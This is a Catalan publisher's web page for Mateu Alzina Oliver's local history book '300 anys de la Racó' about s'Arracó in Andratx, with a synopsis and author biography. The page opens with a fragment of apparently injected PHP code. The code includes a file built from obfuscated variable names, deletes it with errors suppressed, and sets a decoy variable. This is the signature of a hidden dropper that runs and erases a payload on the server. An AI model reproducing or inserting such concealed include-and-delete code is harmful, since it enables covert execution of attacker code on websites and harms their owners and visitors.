");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - 300 anys de la Racó
Cercador d'Obres
ORDENAR:
Començar recerca

300 anys de la Racó

S'Arracó-Andratx

Alzina Oliver, Mateu

Prologuista:
Román Piña Homs
Col·lecció:
Arbre de Mar
Tema:
Història
Pàgines:
208
PVP:
16.00
ISBN:
978-84-15081-58-6
Data d'Edició:
22/04/2011
Aquesta és una història singular, de fets petits, entranyables, de la vida en un poble d’Andratx que un dia es va declarar independent. 
Sinopsi
Partint de la jornada en què un noble de Ciutat va visitar la vall de la Racó i hi va fer aixecar una capella, l’autor ens evoca les vicissituds d’un temps en què s’agafava el vapor per anar a arrabassar esponges a Cuba o es prenien els atapins i s’obria un restaurant a França. Tot això profusament il·lustrat i amb un gran nombre de fotografies inèdites fins ara.
La història d’aquest petit poble servirà als lectors de mirall per recordar -sempre amb una mica de nostàlgia- allò que va passar a casa seva, perquè aquests 300 anys de la Racó poden ser, també, els darrers tres-cents anys de qualsevol indret mallorquí.
Mateu Alzina Oliver
(Palma, 1933-2013) va mostrar de molt jove afició per l’escriptura. Fruit d’aquells primers anys va ser una novel·leta titulada Carrer de la Dragona. Estudiant el batxillerat, va col·laborar en el diari Correo de Mallorca amb la columna d’entrevistes «Vis a vis» (caricatura més entrevista), la qual va aparèixer entre 1948 i 1953. Quan vivia a Bons Aires (Argentina) va col·laborar en les revistes Billiken, PBT, Mundo Agrícola i Mundo Atómico, sense deixar d’enviar cròniques, com a corresponsal, al Correo de Mallorca. En aquella època va tenir cura de la il·lustració de La exploración del espacio. Després va passar a treballar a Houston (Texas), on va estudiar amb el professor Lowell Collins les cultures precolombines del golf mexicà, motiu pel qual va il·lustrar el llibre Las culturas de Mesoamérica. A la Universitat de Saint Thomas, i de la mà del catedràtic Sam Heaven, va estudiar mecànica de l’obra teatral, la qual cosa el va dur a escriure dotze obres, tres de les quals es varen representar al Teatre Municipal de Palma. Una vegada retirat a s’Arracó, va publicar articles i cròniques de caire cultural en la revista de premsa forana Maganova-Andratx, i va publicar la comunicació «Caiguda d’un bimotor en es Campàs durant la Guerra Civil» en les Actes de les I Jornades d’Estudis Locals d’Andratx (2006).
Així mateix, és l’autor de monografies d’història local relacionades amb el municipi d’Andratx, com la His­tòria d’Andratx en còmic (2001), de la qual fou l’autor del guió i de les il·lustracions. Posteriorment va dibuixar les il·lustracions de Les rondalles de la Racó (2004), recull de petits relats dels alumnes del col·legi els Molins de s’Arracó. L’any 2008 va guanyar el Premi Pere Ferrer d’Investigació amb l’obra 300 anys de la Racó: S’Arracó-Andratx (2011). Altres treballs que l’autor ha deixat inèdits són I a tu, d’on et diuen?, sobre malnoms de s’Arracó; Notes històriques de Sant Elm; i L’església de Santa Catalina Thomàs de Samt Elm. Recomanar
Comentar
Comentaris (0)